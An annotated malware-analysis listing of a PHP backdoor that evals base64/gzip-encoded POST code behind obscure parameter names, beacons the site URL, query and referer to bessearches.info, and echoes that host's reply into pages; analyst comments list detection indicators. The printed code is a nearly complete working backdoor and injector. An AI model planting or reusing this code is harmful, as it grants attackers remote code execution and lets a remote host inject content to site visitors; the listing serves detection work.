// Annotated listing of a PHP backdoor combined with a remote content injector.
// NOTE(review): descriptive names such as $URL_PARAM_OBFUSTCATED and $UNKNOWN_PARAMETER
// appear to be analyst renames; the remaining I/l/1 identifiers are left as found.
//
// Behaviour visible in this listing:
//   1. Unauthenticated code execution: a request with GET parameter "l11Ill1II" set and a
//      non-empty POST field "I1llI1" has that field base64-decoded, inflated and eval()'d.
//   2. A request with a non-empty GET parameter "a" receives the JavaScript decoder held
//      in $functionCode and nothing else.
//   3. Any other request that carries a query string is reported to $SUBMISSION_ADDRESS
//      (script URL, query string, account id, referer); the reply is base64-decoded,
//      inflated and echoed into the response.
//
// Indicators taken from this listing, usable for log, file and egress review:
//   - request parameter names "l11Ill1II" (GET) and "I1llI1" (POST)
//   - outbound HTTP to bessearches.info, path /virtual/gen.php
//   - fallback requests over raw port-80 sockets with the fixed User-Agent ending in
//     "MyIE2)" and a Referer value of the form "http//host" (no colon after the scheme)
//   - account tag "kia2" sent as the "acc" parameter

// Account tag reported to the remote server in the "acc" parameter.
$ACCOUNT="kia2";
// Suppress all PHP error output.
error_reporting(0);

// Record whether allow_url_fopen is enabled, i.e. whether URLs can be opened with the file functions.
if (@ini_get('allow_url_fopen')==1) {
    $CANOPENURLASFILE="on";
} else{
    $CANOPENURLASFILE="off";
}

// Backdoor entry point: no credential is checked beyond knowing the two parameter names.
// The POST field is expected to be base64(gzdeflate(<PHP code>)).
if (isset($_GET["l11Ill1II"]) && !empty($_POST["I1llI1"])) {
    // An argument of 0 removes the execution time limit (it does not set it to zero seconds).
    set_time_limit(0);
    // Arbitrary PHP supplied by the requester runs with the privileges of the web server process.
    eval(gzinflate(base64_decode($_POST["I1llI1"])));
    exit;
}

// $functionCode holds a JavaScript function z(str). If str has no '?', z returns str unchanged.
// Otherwise it reads the text after the first '?' two hex digits at a time, adds a counter
// that starts at 1 to each byte value (mod 256), and passes the decoded string to document.write().
$functionCode = "function z(str) { var a = str.indexOf('?'); if (a == -1) return str; var len = str.length; var b = ''; var i = 1; for (++a; a < len; a += 2,i++) { var ch = parseInt(str.substr(a, 2), 16); b += String.fromCharCode((ch + i) % 256); } document.write(b); }";

/**
 * Send one hand-built HTTP/1.0 request over a raw socket to port 80 and return the reply.
 *
 * @param string $SUBMISSION_ADDRESS    Full URL; host, scheme, path and query are taken from parse_url().
 * @param string $URL_PARAM_OBFUSTCATED Request body; also used to compute the Content-Length header.
 * @param string $TYPE                  HTTP method; upper-cased before use.
 * @param string $UNKNOWN_PARAMETER     When truthy, sent verbatim as the value of a Cookie header.
 *
 * @return string|null The whole response when it contains no "\n\r" sequence, the trimmed second
 *                     part when it contains exactly one, and nothing (null) in every other case.
 */
function TALK_HTTP($SUBMISSION_ADDRESS, $URL_PARAM_OBFUSTCATED = "", $TYPE = "get", $UNKNOWN_PARAMETER = "") {
    // Parsed URL components.
    $IIIIIIIIII1l = parse_url($SUBMISSION_ADDRESS);
    // Line terminator used for the request headers.
    $IIIIIIIIII11 = "\r\n";
    $host = $IIIIIIIIII1l["host"];
    // Referer value. The scheme is joined to "//host" without a colon, so the header reads
    // "http//host"; that malformed value is a usable network signature.
    $IIIIIIIIIlII = $IIIIIIIIII1l["scheme"]."//$host";
    $path = $IIIIIIIIII1l["path"];
    // Re-attach the query string to the path when the URL has one.
    if (isset($IIIIIIIIII1l['query'])) $IIIIIIIIIlIl = $IIIIIIIIII1l["query"];
    if (isset($IIIIIIIIIlIl) && !empty($IIIIIIIIIlIl)) $path.="?".$IIIIIIIIIlIl;
    // Complete request: request line, fixed headers, blank line, then the body.
    $IIIIIIIIIlI1 = strtoupper($TYPE)." $path HTTP/1.0".$IIIIIIIIII11.
        "Referer: $IIIIIIIIIlII".$IIIIIIIIII11.
        ($UNKNOWN_PARAMETER ? "Cookie: ".$UNKNOWN_PARAMETER.$IIIIIIIIII11 : "").
        "Connection: Keep-Alive".$IIIIIIIIII11.
        "Cache-Control: no-cache".$IIIIIIIIII11.
        "Content-Type: application/x-www-form-urlencoded".$IIIIIIIIII11.
        "Content-Length: ".strlen($URL_PARAM_OBFUSTCATED).$IIIIIIIIII11.
        "Host: $host".$IIIIIIIIII11.
        "Accept: */*".$IIIIIIIIII11.
        "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MyIE2)".$IIIIIIIIII11."".$IIIIIIIIII11.
        $URL_PARAM_OBFUSTCATED;
    // Always plain HTTP on port 80; the return value of fsockopen() is not checked.
    $SOCK_HANDLE = fsockopen($host, 80);
    fputs($SOCK_HANDLE, $IIIIIIIIIlI1);
    // Read until the peer closes; '@' hides the notice from appending to an unset $RESPONSE.
    while(!feof($SOCK_HANDLE)){
        @$RESPONSE .= fgets($SOCK_HANDLE);
    }
    fclose($SOCK_HANDLE);
    // Split on "\n\r", the middle of the "\r\n\r\n" header/body separator.
    $RESPONSE_ARRAY = explode("\n\r",$RESPONSE);
    if (count($RESPONSE_ARRAY)==1){
        return $RESPONSE;
    } elseif(count($RESPONSE_ARRAY)==2) {
        // trim() also removes the "\n" left at the start of the body by the split.
        return trim($RESPONSE_ARRAY[1]);
    }
}

// A non-empty GET "a" serves only the JavaScript decoder and stops.
if (!empty($_GET["a"])) {exit($functionCode);}

// Choose the "key" to report: $_SERVER['argv'], else the raw query string, else GET "show".
// A request with none of these ends here without output.
if (!empty($_SERVER['argv'])) {$argv = $_SERVER['argv'];}
elseif (!empty($_SERVER['QUERY_STRING'])) {$argv[0] = $_SERVER['QUERY_STRING'];}
elseif (!empty($_GET['show'])) {$argv[0] = $_GET['show'];}
else {exit;};

// Beacon parameters: this script's own URL, the key and the account tag.
// The key is appended without urlencode(), unlike the referer below.
$URL_PARAM = "url=http://".$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']."&key=".$argv[0]."&acc=$ACCOUNT";
if (!empty($_SERVER['HTTP_REFERER'])) {
    $URL_PARAM .= "&ref=".urlencode($_SERVER['HTTP_REFERER']);
}

// Remote endpoint that receives the beacon and supplies the content to display.
$SUBMISSION_ADDRESS = "http://bessearches.info/virtual/gen.php";

if ($CANOPENURLASFILE=="on") {
    // Preferred path: plain GET through the URL file wrappers, with errors suppressed.
    $FILE_CONTENTS = @file_get_contents($SUBMISSION_ADDRESS."?".$URL_PARAM);
    if (empty($FILE_CONTENTS)) {
        // Retry through fopen(), reading the reply in 4096-byte blocks.
        $HANDLE = fopen($SUBMISSION_ADDRESS."?".$URL_PARAM,'r');
        while (!feof ($HANDLE)) {
            $block = fread($HANDLE, 4096);
            $FILE_CONTENTS .= $block;
        }
        fclose($HANDLE);
    }
} elseif($CANOPENURLASFILE=="off") {
    // $FILE_CONTENTS has not been assigned on this path, so the check below always passes.
    if (empty($FILE_CONTENTS)) {
        // Fallback: POST the same parameters as cmd=urlencode(base64(gzdeflate(...))) over the raw socket.
        // NOTE(review): as transcribed, the opening double quote before cmd= is missing and this
        // statement does not parse; the literal was presumably "cmd=" - confirm against the original sample.
        $precalculated = cmd=".urlencode(base64_encode(gzdeflate($URL_PARAM)));
        $FILE_CONTENTS = TALK_HTTP( $SUBMISSION_ADDRESS, $URL_PARAM_OBFUSTCATED = $precalculated, $TYPE = "post", "" );
    }
}

// The reply is base64-decoded, inflated and written to the response without escaping,
// so the remote host decides what visitors to this page receive.
// NOTE(review): reporting url/key/ref and echoing the reply resembles a spam doorway;
// the listing itself shows only the echo.
echo gzinflate(base64_decode($FILE_CONTENTS));